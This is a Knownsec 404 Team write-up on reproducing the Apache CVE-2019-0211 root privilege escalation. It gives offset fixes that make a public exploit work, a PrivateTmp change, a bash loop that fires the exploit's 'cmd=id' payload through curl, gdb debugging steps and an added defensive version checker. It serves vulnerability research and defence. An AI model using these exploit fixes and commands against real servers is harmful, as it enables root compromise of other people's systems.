Author: Hcamael@Knownsec 404 Team
Chinese Version: https://paper.seebug.org/889/
In April, an Apache root privilege escalation (CVE-2019-0211) was disclosed, and an exploitation script for it was released on GitHub. This paper mainly discusses the problems encountered when reproducing this vulnerability.
The reproduction environment
# OS: the OS itself matters little; the key question is whether the package manager can install the matching Apache version
$ lsb_release -a
Distributor ID: Ubuntu
Description:    Ubuntu 18.04.1 LTS
Release:        18.04
Codename:       bionic

# Apache version: this version is the key to reproduction
$ apache2 -v
Server version: Apache/2.4.29 (Ubuntu)
Server built:   2018-03-02T02:19:31

# PHP version
$ php -v
PHP 7.2.15-0ubuntu0.18.04.2 (cli) (built: Mar 22 2019 17:05:14) ( NTS )
Copyright (c) 1997-2018 The PHP Group
Zend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies
    with Zend OPcache v7.2.15-0ubuntu0.18.04.2, Copyright (c) 1999-2018, by Zend Technologies
- Install the specified version:
# apt install apache2=2.4.29-1ubuntu4 apache2-bin=2.4.29-1ubuntu4 apache2-utils=2.4.29-1ubuntu4 apache2-data=2.4.29-1ubuntu4
- Use apt to install PHP directly.
- The exploit (exp) is at: https://github.com/cfreal/exploits/blob/master/CVE-2019-0211-apache/cfreal-carpediem.php
- Enable the "ssl" module.
Why the "ssl" module needs to be enabled:
- Even if you don't enable the "ssl" module, the vulnerability still exists.
- Even if you don't enable the "ssl" module, you can modify the Apache configuration to open other ports.
- If only port 80 is open, you need to find another exploitation chain. The exp's GitHub page states that it does not work with only one port open.
- The relevant code can be seen in 1 and 2, as well as in the following macro definition:
/* On some architectures it's safe to do unserialized accept()s in the single
 * Listen case. But it's never safe to do it in the case where there's
 * multiple Listen statements. Define SINGLE_LISTEN_UNSERIALIZED_ACCEPT
 * when it's safe in the single Listen case. */
#ifdef SINGLE_LISTEN_UNSERIALIZED_ACCEPT
#define SAFE_ACCEPT(stmt) (ap_listeners->next ? (stmt) : APR_SUCCESS)
#else
#define SAFE_ACCEPT(stmt) (stmt)
#endif
In short, the mutex is created only when Apache listens on multiple ports, and the exp posted on GitHub relies on that mutex.
Problems encountered while reproducing the vulnerability
After trying many versions, none of them could use the exp from GitHub directly. In the versions listed above, two problems were found that cause exploitation to fail:
- A calculation problem in:
$all_buckets = $i - 0x10;
- A calculation problem in:
$bucket_index = $bucket_index_middle - (int) ($total_nb_buckets / 2);
For the first point, if you use GDB to debug the computed all_buckets address, you will find that the value is correct. However, after executing the apache2ctl graceful command, all_buckets takes a new value, which is only 0x38000 away from the previous one, so this problem is easily solved:
$all_buckets = $i - 0x10 + 0x38000;
Change the second calculation directly as follows:
$bucket_index = $bucket_index_middle;
Problems when reproducing the vulnerability on Ubuntu:
It appears to execute successfully, but the "2323232" file is not found in the /tmp directory. Further investigation shows that systemd redirects Apache's tmp directory. Running $ find /tmp -name "2323232" locates the file, but only the root user can access it. If you don't want systemd to redirect the tmp directory, it is very simple: set PrivateTmp=false as shown below. Restart after the change and test again, and the file is written under the /tmp directory:
$ cat /lib/systemd/system/apache2.service
[Unit]
Description=The Apache HTTP Server
After=network.target remote-fs.target nss-lookup.target

[Service]
Type=forking
Environment=APACHE_STARTED_BY_SYSTEMD=true
ExecStart=/usr/sbin/apachectl start
ExecStop=/usr/sbin/apachectl stop
ExecReload=/usr/sbin/apachectl graceful
PrivateTmp=false
Restart=on-abort

[Install]
WantedBy=multi-user.target
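From a defender's side, the two facts above (the exact httpd build and whether the apache2.service unit keeps a private /tmp) are what you would want to check on your own hosts. The following is an added example, not code from the original paper or from the exploit author: it parses the output of apache2 -v and a systemd unit file, flags builds inside the range the CVE-2019-0211 advisory names (2.4.17 through 2.4.38, fixed in 2.4.39), and reports whether PrivateTmp is on. The sample banner and unit texts are constructed inline (the banner matches the Ubuntu build used above); distribution packages may backport the fix, so a version hit means "check the package changelog", not proof of exposure.

```python
import re
from typing import Dict, List, Optional, Tuple

# Affected range per the CVE-2019-0211 advisory (fixed in 2.4.39).
AFFECTED_MIN = (2, 4, 17)
AFFECTED_MAX = (2, 4, 38)

VERSION_RE = re.compile(r"Server version:\s*Apache/(\d+)\.(\d+)\.(\d+)")

# Constructed sample inputs: the banner reproduces the Ubuntu 18.04 build used
# in the paper; the two unit texts show Ubuntu's shipped setting and the
# weakened setting the paper applies to make /tmp shared with the host.
SAMPLE_BANNER = "Server version: Apache/2.4.29 (Ubuntu)\nServer built:   2018-03-02T02:19:31\n"
UNIT_PRIVATE_TMP = "[Unit]\nDescription=The Apache HTTP Server\n\n[Service]\nType=forking\nPrivateTmp=true\n\n[Install]\nWantedBy=multi-user.target\n"
UNIT_SHARED_TMP = UNIT_PRIVATE_TMP.replace("PrivateTmp=true", "PrivateTmp=false")


def parse_httpd_version(banner: str) -> Optional[Tuple[int, int, int]]:
    """Extract (major, minor, patch) from `apache2 -v` / `httpd -v` output."""
    m = VERSION_RE.search(banner)
    if not m:
        return None
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def version_in_affected_range(version: Tuple[int, int, int]) -> bool:
    """True when the upstream version number falls inside the advisory's range."""
    return AFFECTED_MIN <= version <= AFFECTED_MAX


def private_tmp_setting(unit_text: str) -> Optional[bool]:
    """Return the PrivateTmp= value from the [Service] section, or None if unset.

    systemd's default for an unset PrivateTmp= is "no", so None also means the
    service shares the host /tmp. The last assignment wins, as in systemd.
    """
    section = None
    value: Optional[bool] = None
    for raw in unit_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section == "Service" and "=" in line:
            key, _, val = line.partition("=")
            if key.strip() == "PrivateTmp":
                value = val.strip().lower() in ("yes", "true", "on", "1")
    return value


def assess(banner: str, unit_text: str) -> Dict[str, object]:
    """Combine both checks into a small findings report."""
    version = parse_httpd_version(banner)
    private_tmp = private_tmp_setting(unit_text)
    findings: List[str] = []
    if version is None:
        findings.append("could not parse httpd version from banner")
    elif version_in_affected_range(version):
        findings.append(
            "httpd %d.%d.%d is inside the CVE-2019-0211 range 2.4.17-2.4.38; "
            "verify whether the distribution package carries a backported fix" % version
        )
    if private_tmp is not True:
        findings.append("PrivateTmp is not enabled: the service shares the host /tmp")
    return {"version": version, "private_tmp": private_tmp, "findings": findings}


if __name__ == "__main__":
    for label, unit in (("shipped unit", UNIT_PRIVATE_TMP), ("weakened unit", UNIT_SHARED_TMP)):
        report = assess(SAMPLE_BANNER, unit)
        print(label, report["version"], "PrivateTmp=%s" % report["private_tmp"])
        for f in report["findings"]:
            print("  -", f)
```

On a real host, feed it the output of apache2 -v and the contents of /lib/systemd/system/apache2.service (plus any drop-in under /etc/systemd/system/apache2.service.d/, since drop-ins can override PrivateTmp=); the version check is deliberately conservative, because Ubuntu and Debian patch CVEs in place without bumping the upstream version number.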
About success rate
The comments in the exp say it is not 100% successful, so I wrote a script to test it.
root@vultr:~# cat check
#!/bin/bash
SUCC=0
COUNT=0
for i in $(seq 1 20)
do
    let COUNT+=1
    /etc/init.d/apache2 stop
    sleep 1
    /etc/init.d/apache2 start
    if [ -f "/tmp/1982347" ];then
        rm /tmp/1982347
    fi
    curl "http://localhost/cfreal-carpediem.php?cmd=id>/tmp/1982347"
    apache2ctl graceful
    sleep 1
    if [ -f "/tmp/1982347" ];then
        let SUCC+=1
    fi
done
echo "COUNT: $COUNT"
echo "SUCCESS: $SUCC"
The result of 20 test runs: no failures.
# ./check
......
COUNT: 20
SUCCESS: 20
Other versions have not been tested yet, but here are some suggestions.
After the exp runs, it prints the corresponding all_buckets address. You can use gdb attach to check whether the address is correct.
PS: This requires installing the dbg package:
apt install apache2-dbg=2.4.29-1ubuntu4
If there is a problem, debug and check the procedure by which the exp searches for the all_buckets address. If there is no problem, use gdb attach on the main process (the process with root privileges), set a breakpoint at make_child, and then execute apache2ctl graceful. When gdb stops at the breakpoint, run p all_buckets again. Compare it with the value obtained by the exp; if they are the same, there is no problem.
The procedure for the next step is the same as above, focusing on the code where my_bucket is assigned.
Note that there is a fork before that point, so add set follow-fork-mode child in gdb.
The value of my_bucket points to a heap address. If the value of my_bucket is fine, the exp is basically correct. If not, adjust
Debian 9 was also tested successfully.
# cat /etc/issue
Debian GNU/Linux 9 \n \l

# apache2 -v
Server version: Apache/2.4.25 (Debian)
Server built:   2018-11-03T18:46:19

# php -v
PHP 7.0.33-0+deb9u3 (cli) (built: Mar 8 2019 10:01:24) ( NTS )
Copyright (c) 1997-2017 The PHP Group
Zend Engine v3.0.0, Copyright (c) 1998-2017 Zend Technologies
    with Zend OPcache v7.0.33-0+deb9u3, Copyright (c) 1999-2017, by Zend Technologies
About Knownsec & 404 Team
Beijing Knownsec Information Technology Co., Ltd. was established by a group of high-profile international security experts. It has over a hundred frontier security talents nationwide as the core security research team to provide long-term internationally advanced network security solutions for the government and enterprises.
Knownsec's specialties include network attack and defense integrated technologies and product R&D under new situations. It provides visualization solutions that meet the world-class security technology standards and enhances the security monitoring, alarm and defense abilities of customer networks with its industry-leading capabilities in cloud computing and big data processing. The company's technical strength is strongly recognized by the State Ministry of Public Security, the Central Government Procurement Center, the Ministry of Industry and Information Technology (MIIT), China National Vulnerability Database of Information Security (CNNVD), the Central Bank, the Hong Kong Jockey Club, Microsoft, Zhejiang Satellite TV and other well-known clients.
404 Team, the core security team of Knownsec, is dedicated to the research of security vulnerability and offensive and defensive technology in the fields of Web, IoT, industrial control, blockchain, etc. 404 team has submitted vulnerability research to many well-known vendors such as Microsoft, Apple, Adobe, Tencent, Alibaba, Baidu, etc. And has received a high reputation in the industry.
This article is published by Seebug Paper; please credit the source when reprinting. Article URL: https://paper.seebug.org/928/